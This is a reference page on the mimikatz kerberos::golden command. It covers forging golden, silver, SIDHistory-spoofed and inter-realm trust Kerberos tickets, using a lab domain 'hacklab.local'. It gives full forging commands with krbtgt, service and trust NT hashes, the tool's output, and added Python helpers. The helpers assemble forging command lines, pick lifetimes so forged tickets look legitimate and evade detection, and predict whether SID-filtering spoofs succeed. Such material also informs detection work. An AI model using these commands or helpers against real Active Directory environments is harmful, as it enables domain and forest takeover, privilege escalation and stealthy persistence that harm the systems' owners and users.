golden
kerberos::golden forges golden tickets (TGTs signed and encrypted with the domain's KRBTGT key), silver tickets (service tickets signed with a service account's key) and inter-realm trust tickets (referral TGTs signed with a trust key). It takes the following command line arguments:
  • /domain: the Active Directory domain (FQDN) of the user to impersonate
  • /sid: the SID of the Active Directory domain the impersonated user belongs to, i.e. the user's full SID without the trailing RID
  • /sids: extra SIDs to put in the ticket's SIDHistory (ExtraSids) field, used for SIDHistory spoofing against another domain
  • /user: the username to impersonate; keep in mind that Administrator is not the only name for this well-known account, it may have been renamed, so identify it by RID 500 rather than by name
  • /ticket: save the ticket to a .kirbi file
  • /groups: RIDs of the groups the user belongs to (the first is the primary group, comma separated). Default is 513,512,520,518,519, i.e. Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins and Enterprise Admins
  • /id: the user RID. The default value is 500, the built-in domain Administrator account
  • /target: the server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433)
  • /service: the service class for a silver ticket (ex: cifs, rpcss, http, mssql); mimikatz combines it with /target to form the ticket's service name
  • /ptt: inject the generated ticket directly into the current logon session (pass-the-ticket) instead of writing it to disk
  • /startoffset: offset in minutes from now at which the ticket becomes valid. Default is 0
  • /endin: the ticket lifetime in minutes. The default value is 10 years (5,256,000 minutes); the default Active Directory Kerberos policy is 10 hours (600 minutes), so a ticket left at the default lifetime is easy to spot
  • /renewmax: the maximum renewal lifetime in minutes. The default value is 10 years; the default Active Directory Kerberos policy is 7 days (10,080 minutes)
  • /krbtgt: the krbtgt RC4 key (equivalent to /rc4 when forging a golden ticket)
  • /des: the DES key to be used
  • /rc4: the RC4 key (NT hash) to be used
  • /aes128: the AES128 key to be used. More opsec safe, since current domains issue AES tickets and an RC4 ticket stands out
  • /aes256: the AES256 key to be used. More opsec safe, for the same reason
  • /rodc: generate a golden ticket with the krbtgt hash of a Read Only Domain Controller (each RODC has its own krbtgt_<id> account with its own key and key version)

Golden Ticket

The following are the requirements for generating a golden ticket.
  • The KRBTGT key of the domain. It can be of type RC4 (i.e. the NT hash), DES or AES (depending on which etypes the domain supports and what level of stealth the attacker wants); it is normally obtained by DCSync (lsadump::dcsync) or from a domain controller's NTDS.dit.
  • Domain name (FQDN)
  • Domain SID (the full SID of any domain account with the trailing RID removed)
  • The username to impersonate, ideally a real account so that the name and RID agree with what the domain controllers know
  • The RID of the user account to impersonate. The RID is the rightmost number in a full SID (e.g. 500 for the built-in administrator account)
  • The group RIDs the account should be a member of, read from the group SIDs the same way (e.g. 512 for "Domain Admins", 519 for "Enterprise Admins").
mimikatz # kerberos::golden /domain:hacklab.local /sid:S-1-5-21-2725560159-1428537199-2260736313 /rc4:b5348d0a20a24a67ff544146a09cd292 /user:krbtgt /ticket:ticket.kirbi /groups:500,501,513,512,520,518,519
User      : krbtgt
Domain    : hacklab.local (HACKLAB)
SID       : S-1-5-21-2725560159-1428537199-2260736313
User Id   : 500
Groups Id : *500 501 513 512 520 518 519
ServiceKey: b5348d0a20a24a67ff544146a09cd292 - rc4_hmac_nt
Lifetime  : 19/11/2021 02:55:47 ; 17/11/2031 02:55:47 ; 17/11/2031 02:55:47
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Silver Ticket

A silver ticket is a forged service ticket. It is signed and encrypted with the key of the account running the service (for CIFS on a domain controller, the DC's computer account), so no KDC is contacted and the krbtgt key is not needed; the KDC never sees the ticket, so nothing is logged on the domain controllers. The following are the requirements for generating a silver ticket.
  • The key of the service account: the computer account's NT hash (or AES key) for services running as SYSTEM or Network Service, otherwise the key of the service's user account
  • Domain name and domain SID, exactly as for a golden ticket
  • The username to impersonate and, to stay plausible, its real RID via /id. The example below leaves /id at its default, which is why the output reports User Id : 500 for a non-administrator name
  • The service class (/service) and the host running the service (/target). The example below passes the full SPN as /service, whereas the argument list above expects only the class, e.g. /service:cifs
mimikatz # kerberos::golden /domain:hacklab.local /sid:S-1-5-21-2725560159-1428537199-2260736313 /rc4:647dac3559c899c5fe4dad7723feb8c5 /user:m3g9tr0n /service:CIFS/dc.hacklab.local /target:dc.hacklab.local
User      : m3g9tr0n
Domain    : hacklab.local (HACKLAB)
SID       : S-1-5-21-2725560159-1428537199-2260736313
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 647dac3559c899c5fe4dad7723feb8c5 - rc4_hmac_nt
Service   : CIFS/dc.hacklab.local
Target    : dc.hacklab.local
Lifetime  : 19/11/2021 02:59:22 ; 17/11/2031 02:59:22 ; 17/11/2031 02:59:22
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
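The golden and silver ticket sections above both boil down to assembling one kerberos::golden command line from a domain SID, a RID, a group list and a key. The helper below, an added example that is not part of mimikatz or of this page, derives /sid and /id from an account's full SID (so /id is never left at the default 500 for a non-administrator name), checks that the key has the length the chosen etype switch expects, defaults /endin and /renewmax to the domain policy values quoted in the argument list, and appends /service and /target when a silver ticket is wanted. All function names, the KEY_HEX_LEN table and the sample user SID (the page's domain SID with RID 500 appended) are this example's own assumptions.

```python
# Added example (not mimikatz code): assemble a kerberos::golden command line
# from the requirements listed above. Function and constant names are ours.
import re
from typing import List, Optional, Sequence, Tuple

# Expected key length in hex characters for each mimikatz key switch
KEY_HEX_LEN = {"rc4": 32, "des": 16, "aes128": 32, "aes256": 64}

# Default Active Directory Kerberos policy, in minutes (see /endin, /renewmax)
POLICY_ENDIN_MIN = 10 * 60          # 10 hour TGT lifetime
POLICY_RENEWMAX_MIN = 7 * 24 * 60   # 7 day maximum renewal

# Well-known groups mimikatz puts in the PAC by default (513 first = primary)
DEFAULT_GROUPS = (513, 512, 520, 518, 519)

# Full account SID: S-1-5-21-<three domain sub-authorities>-<RID>
ACCOUNT_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-\d+$")


def split_sid(full_sid: str) -> Tuple[str, int]:
    """Return (domain SID, RID); the RID is the rightmost sub-authority."""
    if not ACCOUNT_SID_RE.match(full_sid):
        raise ValueError(f"not a domain account SID: {full_sid!r}")
    domain_sid, rid = full_sid.rsplit("-", 1)
    return domain_sid, int(rid)


def validate_key(kind: str, key: str) -> str:
    """Check that the key is hex and has the length the switch expects."""
    if kind not in KEY_HEX_LEN:
        raise ValueError(f"unknown key switch /{kind}")
    if len(key) != KEY_HEX_LEN[kind] or not re.fullmatch(r"[0-9a-fA-F]+", key):
        raise ValueError(f"/{kind} needs {KEY_HEX_LEN[kind]} hex chars, got {key!r}")
    return key.lower()


def lifetime_warnings(endin: int, renewmax: int) -> List[str]:
    """Flag lifetimes a domain controller would never issue under the default policy."""
    warnings = []
    if endin > POLICY_ENDIN_MIN:
        warnings.append(f"/endin:{endin} exceeds the default 10 hour TGT lifetime")
    if renewmax > POLICY_RENEWMAX_MIN:
        warnings.append(f"/renewmax:{renewmax} exceeds the default 7 day renewal limit")
    return warnings


def build_golden_command(domain: str, user_sid: str, user: str, key_kind: str, key: str,
                         groups: Sequence[int] = DEFAULT_GROUPS,
                         endin: int = POLICY_ENDIN_MIN, renewmax: int = POLICY_RENEWMAX_MIN,
                         service: Optional[str] = None, target: Optional[str] = None,
                         ticket: str = "ticket.kirbi") -> str:
    """Golden ticket by default (key = krbtgt key); with service and target a
    silver ticket (key = service account key)."""
    domain_sid, rid = split_sid(user_sid)
    parts = [
        "kerberos::golden",
        f"/domain:{domain}",
        f"/sid:{domain_sid}",
        f"/user:{user}",
        f"/id:{rid}",                                  # the account's real RID, never a default 500
        f"/groups:{','.join(str(g) for g in groups)}",
        f"/{key_kind}:{validate_key(key_kind, key)}",
        f"/endin:{endin}",
        f"/renewmax:{renewmax}",
    ]
    if service and target:
        parts += [f"/service:{service}", f"/target:{target}"]
    parts.append(f"/ticket:{ticket}")
    return " ".join(parts)


if __name__ == "__main__":
    # Domain name, domain SID and krbtgt RC4 key come from the page's golden
    # ticket example; the full user SID is constructed by appending RID 500.
    print(build_golden_command(
        domain="hacklab.local",
        user_sid="S-1-5-21-2725560159-1428537199-2260736313-500",
        user="Administrator",
        key_kind="rc4",
        key="b5348d0a20a24a67ff544146a09cd292",
    ))
    # The mimikatz defaults (10 years each) trip both policy warnings
    for w in lifetime_warnings(endin=60 * 24 * 365 * 10, renewmax=60 * 24 * 365 * 10):
        print("warning:", w)
```

Using the policy values as defaults is a deliberate choice: a ticket whose end time is ten years out is a classic golden ticket indicator, and a forged ticket that looks like one the DC would have issued survives longer.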

Golden ticket & SIDHistory spoofing

Inside a single forest, the trust between a child domain and its parent is two-way and transitive and, unlike forest and external trusts, is not subject to SID filtering. A golden ticket forged with the child domain's krbtgt key can therefore carry the parent domain's Enterprise Admins SID (the parent domain SID with RID 519 appended) in its SIDHistory via /sids, and the parent's domain controllers honour it, escalating from child domain admin to control of the whole forest. The requirements are those of a golden ticket plus the SID of the parent domain.
mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name> /ticket:ticket.kirbi /sids:<sid_of_parent_domain>

kerberos::golden /user:Administrator /domain:child.hacklab.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:krbtgt_tkt.kirbi
User      : Administrator
Domain    : child.hacklab.local (CHILD)
SID       : S-1-5-21-1874506631-3219952063-538504511
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-280534878-1496970234-700767426-519 ;
ServiceKey: ff46a9d8bd66c6efd77603da26796f35 - rc4_hmac_nt
Lifetime  : 19/11/2021 1:02:13 AM ; 5/6/2030 1:02:13 AM ; 5/6/2030 1:02:13 AM
-> Ticket : C:\krbtgt_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Inter-Realm Trust Tickets

To obtain the trust keys, run lsadump::trust /patch on a domain controller (lsadump::dcsync against the trust account also works). Depending on the trust relationship, forging with the trust key instead of the krbtgt key can be stealthier, since most defensive monitoring focuses on the krbtgt account. The command below forges an inter-realm referral TGT: /service:krbtgt and /target:<the_target_domain> make it a TGT for the target realm, and /rc4 takes the trust key rather than the krbtgt key. Two caveats apply:
  • The .kirbi produced is a referral ticket, not a service ticket. It must be presented to a KDC of the target domain in a TGS-REQ for a service in that domain before it grants any access.
  • Across a forest or external trust, SID filtering is enabled by default, so the extra SID given with /sids (here the target domain's Enterprise Admins, RID 519) is stripped by the target domain's DC unless SID filtering has been relaxed on that trust. With filtering in place the ticket is still accepted, but only with the rights the impersonated user has as a foreign principal.
mimikatz # kerberos::golden /user:<user_name> /domain:<domain_name> /sid:<domain_sid> /sids:<sid_of_target_domain> /rc4:<trust_key_RC4_key> /service:krbtgt /target:<the_target_domain> /ticket:<file_to_save>

kerberos::golden /user:Administrator /domain:hacklab.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-3146393536-1393405867-2905981701-519 /rc4:172ad9986a524aadaf4d01c1ce7f240f /service:krbtgt /target:bank.local /ticket:trust_tkt.kirbi

User      : Administrator
Domain    : hacklab.local (HACKLAB)
SID       : S-1-5-21-1874506631-3219952063-538504511
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3146393536-1393405867-2905981701-519 ;
ServiceKey: 172ad9986a524aadaf4d01c1ce7f240f - rc4_hmac_nt
Service   : krbtgt
Target    : bank.local
Lifetime  : 19/11/2021 3:01:44 AM ; 5/6/2030 3:01:44 AM ; 5/6/2030 3:01:44 AM
-> Ticket : C:\trust_tkt-us.kirbi
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
Final Ticket Saved to file !
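The SIDHistory spoofing section and this inter-realm section use the same /sids trick, but only the first one works out of the box: the receiving domain controller filters the ExtraSids of an incoming ticket according to the kind of trust it arrived over. The model below is an added example, not mimikatz code and not on the original page, that applies a simplified version of those filtering rules to the SIDs from the two examples above. The trust kinds, the rule that the issuing domain stands in for the whole trusted forest, and the RID >= 1000 rule for forest trusts with SID history enabled are this example's own assumptions about how a DC behaves; the function names are ours.

```python
# Added example (not mimikatz code): what a domain controller keeps of the
# ExtraSids (SIDHistory) in a ticket that arrives over a trust. Simplified
# model; trust kinds, rules and function names are this example's own.
from typing import List

INTRA_FOREST = "intra_forest"                        # parent/child: SID filtering not applied
CROSS_FOREST = "cross_forest"                        # forest/external trust, default SID filtering
CROSS_FOREST_SIDHISTORY = "cross_forest_sidhistory"  # forest trust with SID history enabled
TRUST_KINDS = (INTRA_FOREST, CROSS_FOREST, CROSS_FOREST_SIDHISTORY)


def domain_of(sid: str) -> str:
    """Domain prefix of an S-1-5-21 SID (everything but the RID)."""
    return sid.rsplit("-", 1)[0]


def rid_of(sid: str) -> int:
    """Rightmost sub-authority of a SID."""
    return int(sid.rsplit("-", 1)[1])


def filter_extra_sids(issuing_domain_sid: str, extra_sids: List[str], trust_kind: str) -> List[str]:
    """Return the extra SIDs the receiving DC keeps.

    Model (assumed, with the issuing domain standing in for its whole forest):
      INTRA_FOREST:            everything is kept; SID filtering is not applied inside a forest.
      CROSS_FOREST:            only SIDs belonging to the issuing (trusted) domain survive;
                               SIDs of any other domain, including the target's own, are dropped.
      CROSS_FOREST_SIDHISTORY: foreign SIDs with RID >= 1000 are additionally kept, but the
                               well-known RIDs below 1000 (500, 512, 519, ...) are still dropped.
    """
    if trust_kind not in TRUST_KINDS:
        raise ValueError(f"unknown trust kind {trust_kind!r}")
    kept = []
    for sid in extra_sids:
        own = domain_of(sid) == issuing_domain_sid
        if trust_kind == INTRA_FOREST or own:
            kept.append(sid)
        elif trust_kind == CROSS_FOREST_SIDHISTORY and rid_of(sid) >= 1000:
            kept.append(sid)
        # CROSS_FOREST with a foreign SID: filtered out
    return kept


def spoof_succeeds(issuing_domain_sid: str, target_group_sid: str, trust_kind: str) -> bool:
    """Does a spoofed SID survive filtering on its way into the target domain?"""
    return target_group_sid in filter_extra_sids(issuing_domain_sid, [target_group_sid], trust_kind)


if __name__ == "__main__":
    # Domain SIDs and extra SIDs taken from the two examples above
    child = "S-1-5-21-1874506631-3219952063-538504511"
    parent_ea = "S-1-5-21-280534878-1496970234-700767426-519"
    hacklab = "S-1-5-21-1874506631-3219952063-538504511"
    bank_ea = "S-1-5-21-3146393536-1393405867-2905981701-519"
    # Constructed: a custom group with RID >= 1000 in the target forest
    bank_custom = "S-1-5-21-3146393536-1393405867-2905981701-1106"

    print("child -> parent EA, intra-forest:        ", spoof_succeeds(child, parent_ea, INTRA_FOREST))
    print("hacklab -> bank EA, default filtering:   ", spoof_succeeds(hacklab, bank_ea, CROSS_FOREST))
    print("hacklab -> bank EA, SID history enabled: ", spoof_succeeds(hacklab, bank_ea, CROSS_FOREST_SIDHISTORY))
    print("hacklab -> bank RID 1106, SID history on:", spoof_succeeds(hacklab, bank_custom, CROSS_FOREST_SIDHISTORY))
```

Run before forging: if the target is reached over a forest trust with default filtering, a ticket carrying the target's RID 519 is accepted but the extra SID is silently dropped, and the session ends up with ordinary foreign-user rights rather than Enterprise Admin.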